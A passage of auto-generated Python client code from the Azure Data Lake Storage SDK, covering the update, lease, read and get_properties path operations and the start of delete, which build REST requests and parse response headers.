:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SetAccessControlRecursiveResponse, or the result of cls(response)
:rtype: ~azure.storage.filedatalake.models.SetAccessControlRecursiveResponse or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.SetAccessControlRecursiveResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_content_md5 = None
_lease_id = None
_cache_control = None
_content_type = None
_content_disposition = None
_content_encoding = None
_content_language = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
if path_http_headers is not None:
_content_md5 = path_http_headers.content_md5
_cache_control = path_http_headers.cache_control
_content_type = path_http_headers.content_type
_content_disposition = path_http_headers.content_disposition
_content_encoding = path_http_headers.content_encoding
_content_language = path_http_headers.content_language
content_type = kwargs.pop("content_type", "application/octet-stream")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
query_parameters['action'] = self._serialize.query("action", action, 'str')
if max_records is not None:
query_parameters['maxRecords'] = self._serialize.query("max_records", max_records, 'int', minimum=1)
if continuation is not None:
query_parameters['continuation'] = self._serialize.query("continuation", continuation, 'str')
query_parameters['mode'] = self._serialize.query("mode", mode, 'str')
if force_flag is not None:
query_parameters['forceFlag'] = self._serialize.query("force_flag", force_flag, 'bool')
if position is not None:
query_parameters['position'] = self._serialize.query("position", position, 'long')
if retain_uncommitted_data is not None:
query_parameters['retainUncommittedData'] = self._serialize.query("retain_uncommitted_data", retain_uncommitted_data, 'bool')
if close is not None:
query_parameters['close'] = self._serialize.query("close", close, 'bool')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if content_length is not None:
header_parameters['Content-Length'] = self._serialize.header("content_length", content_length, 'long', minimum=0)
if _content_md5 is not None:
header_parameters['x-ms-content-md5'] = self._serialize.header("content_md5", _content_md5, 'bytearray')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _cache_control is not None:
header_parameters['x-ms-cache-control'] = self._serialize.header("cache_control", _cache_control, 'str')
if _content_type is not None:
header_parameters['x-ms-content-type'] = self._serialize.header("content_type", _content_type, 'str')
if _content_disposition is not None:
header_parameters['x-ms-content-disposition'] = self._serialize.header("content_disposition", _content_disposition, 'str')
if _content_encoding is not None:
header_parameters['x-ms-content-encoding'] = self._serialize.header("content_encoding", _content_encoding, 'str')
if _content_language is not None:
header_parameters['x-ms-content-language'] = self._serialize.header("content_language", _content_language, 'str')
if properties is not None:
header_parameters['x-ms-properties'] = self._serialize.header("properties", properties, 'str')
if owner is not None:
header_parameters['x-ms-owner'] = self._serialize.header("owner", owner, 'str')
if group is not None:
header_parameters['x-ms-group'] = self._serialize.header("group", group, 'str')
if permissions is not None:
header_parameters['x-ms-permissions'] = self._serialize.header("permissions", permissions, 'str')
if acl is not None:
header_parameters['x-ms-acl'] = self._serialize.header("acl", acl, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content_kwargs['stream_content'] = body
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
deserialized = None
if response.status_code == 200:
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
response_headers['x-ms-continuation']=self._deserialize('str', response.headers.get('x-ms-continuation'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
deserialized = self._deserialize('SetAccessControlRecursiveResponse', pipeline_response)
if response.status_code == 202:
response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
update.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def lease(
self,
x_ms_lease_action, # type: Union[str, "_models.PathLeaseAction"]
request_id_parameter=None, # type: Optional[str]
timeout=None, # type: Optional[int]
x_ms_lease_duration=None, # type: Optional[int]
x_ms_lease_break_period=None, # type: Optional[int]
proposed_lease_id=None, # type: Optional[str]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Lease Path.
Create and manage a lease to restrict write and delete access to the path. This operation
supports conditional HTTP requests. For more information, see `Specifying Conditional Headers
for Blob Service Operations <https://docs.microsoft.com/en-
us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations>`_.
:param x_ms_lease_action: There are five lease actions: "acquire", "break", "change", "renew",
and "release". Use "acquire" and specify the "x-ms-proposed-lease-id" and "x-ms-lease-duration"
to acquire a new lease. Use "break" to break an existing lease. When a lease is broken, the
lease break period is allowed to elapse, during which time no lease operation except break and
release can be performed on the file. When a lease is successfully broken, the response
indicates the interval in seconds until a new lease can be acquired. Use "change" and specify
the current lease ID in "x-ms-lease-id" and the new lease ID in "x-ms-proposed-lease-id" to
change the lease ID of an active lease. Use "renew" and specify the "x-ms-lease-id" to renew an
existing lease. Use "release" and specify the "x-ms-lease-id" to release a lease.
:type x_ms_lease_action: str or ~azure.storage.filedatalake.models.PathLeaseAction
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param x_ms_lease_duration: The lease duration is required to acquire a lease, and specifies
the duration of the lease in seconds. The lease duration must be between 15 and 60 seconds or
-1 for infinite lease.
:type x_ms_lease_duration: int
:param x_ms_lease_break_period: The lease break period duration is optional to break a lease,
and specifies the break period of the lease in seconds. The lease break duration must be
between 0 and 60 seconds.
:type x_ms_lease_break_period: int
:param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns
400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid
Constructor (String) for a list of valid GUID string formats.
:type proposed_lease_id: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
accept = "application/json"
# Construct URL
url = self.lease.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
header_parameters['x-ms-lease-action'] = self._serialize.header("x_ms_lease_action", x_ms_lease_action, 'str')
if x_ms_lease_duration is not None:
header_parameters['x-ms-lease-duration'] = self._serialize.header("x_ms_lease_duration", x_ms_lease_duration, 'int')
if x_ms_lease_break_period is not None:
header_parameters['x-ms-lease-break-period'] = self._serialize.header("x_ms_lease_break_period", x_ms_lease_break_period, 'int')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if proposed_lease_id is not None:
header_parameters['x-ms-proposed-lease-id'] = self._serialize.header("proposed_lease_id", proposed_lease_id, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
if response.status_code == 200:
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
if response.status_code == 201:
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id'))
if response.status_code == 202:
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-lease-time']=self._deserialize('str', response.headers.get('x-ms-lease-time'))
if cls:
return cls(pipeline_response, None, response_headers)
lease.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def read(
self,
request_id_parameter=None, # type: Optional[str]
timeout=None, # type: Optional[int]
range=None, # type: Optional[str]
x_ms_range_get_content_md5=None, # type: Optional[bool]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> IO
"""Read File.
Read the contents of a file. For read operations, range requests are supported. This operation
supports conditional HTTP requests. For more information, see `Specifying Conditional Headers
for Blob Service Operations <https://docs.microsoft.com/en-
us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations>`_.
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param range: The HTTP Range request header specifies one or more byte ranges of the resource
to be retrieved.
:type range: str
:param x_ms_range_get_content_md5: Optional. When this header is set to "true" and specified
together with the Range header, the service returns the MD5 hash for the range, as long as the
range is less than or equal to 4MB in size. If this header is specified without the Range
header, the service returns status code 400 (Bad Request). If this header is set to true when
the range exceeds 4 MB in size, the service returns status code 400 (Bad Request).
:type x_ms_range_get_content_md5: bool
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: IO, or the result of cls(response)
:rtype: IO
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[IO]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
accept = "application/json"
# Construct URL
url = self.read.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if range is not None:
header_parameters['Range'] = self._serialize.header("range", range, 'str')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if x_ms_range_get_content_md5 is not None:
header_parameters['x-ms-range-get-content-md5'] = self._serialize.header("x_ms_range_get_content_md5", x_ms_range_get_content_md5, 'bool')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=True, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 206]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
if response.status_code == 200:
response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-resource-type']=self._deserialize('str', response.headers.get('x-ms-resource-type'))
response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
deserialized = response.stream_download(self._client._pipeline)
if response.status_code == 206:
response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
response_headers['x-ms-content-md5']=self._deserialize('str', response.headers.get('x-ms-content-md5'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-resource-type']=self._deserialize('str', response.headers.get('x-ms-resource-type'))
response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
deserialized = response.stream_download(self._client._pipeline)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
read.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def get_properties(
self,
request_id_parameter=None, # type: Optional[str]
timeout=None, # type: Optional[int]
action=None, # type: Optional[Union[str, "_models.PathGetPropertiesAction"]]
upn=None, # type: Optional[bool]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Get Properties | Get Status | Get Access Control List.
Get Properties returns all system and user defined properties for a path. Get Status returns
all system defined properties for a path. Get Access Control List returns the access control
list for a path. This operation supports conditional HTTP requests. For more information, see
`Specifying Conditional Headers for Blob Service Operations <https://docs.microsoft.com/en-
us/rest/api/storageservices/specifying-conditional-headers-for-blob-service-operations>`_.
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param action: Optional. If the value is "getStatus" only the system defined properties for the
path are returned. If the value is "getAccessControl" the access control list is returned in
the response headers (Hierarchical Namespace must be enabled for the account), otherwise the
properties are returned.
:type action: str or ~azure.storage.filedatalake.models.PathGetPropertiesAction
:param upn: Optional. Valid only when Hierarchical Namespace is enabled for the account. If
"true", the user identity values returned in the x-ms-owner, x-ms-group, and x-ms-acl response
headers will be transformed from Azure Active Directory Object IDs to User Principal Names. If
"false", the values will be returned as Azure Active Directory Object IDs. The default value is
false. Note that group and application Object IDs are not translated because they do not have
unique friendly names.
:type upn: bool
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
accept = "application/json"
# Construct URL
url = self.get_properties.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if action is not None:
query_parameters['action'] = self._serialize.query("action", action, 'str')
if upn is not None:
query_parameters['upn'] = self._serialize.query("upn", upn, 'bool')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", _if_match, 'str')
if _if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", _if_none_match, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges'))
response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control'))
response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition'))
response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding'))
response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language'))
response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length'))
response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range'))
response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
response_headers['Content-MD5']=self._deserialize('str', response.headers.get('Content-MD5'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['x-ms-resource-type']=self._deserialize('str', response.headers.get('x-ms-resource-type'))
response_headers['x-ms-properties']=self._deserialize('str', response.headers.get('x-ms-properties'))
response_headers['x-ms-owner']=self._deserialize('str', response.headers.get('x-ms-owner'))
response_headers['x-ms-group']=self._deserialize('str', response.headers.get('x-ms-group'))
response_headers['x-ms-permissions']=self._deserialize('str', response.headers.get('x-ms-permissions'))
response_headers['x-ms-acl']=self._deserialize('str', response.headers.get('x-ms-acl'))
response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
if cls:
return cls(pipeline_response, None, response_headers)
get_properties.metadata = {'url': '/{filesystem}/{path}'} # type: ignore
def delete(
self,
request_id_parameter=None, # type: Optional[str]
timeout=None, # type: Optional[int]
recursive=None, # type: Optional[bool]
continuation=None, # type: Optional[str]
lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"]
modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete File | Delete Directory.
Delete the file or directory. This operation supports conditional HTTP requests. For more
information, see `Specifying Conditional Headers for Blob Service Operations
<https://docs.microsoft.com/en-us/rest/api/storageservices/specifying-conditional-headers-for-
blob-service-operations>`_.
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param recursive: Required.
:type recursive: bool
:param continuation: Optional. When deleting a directory, the number of paths that are deleted
with each invocation is limited. If the number of paths to be deleted exceeds this limit, a
continuation token is returned in this response header. When a continuation token is returned
in the response, it must be specified in a subsequent invocation of the delete operation to
continue deleting the directory.
:type continuation: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.filedatalake.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.filedatalake.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_match = None
_if_none_match = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_match = modified_access_conditions.if_match
_if_none_match = modified_access_conditions.if_none_match
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
if recursive is not None:
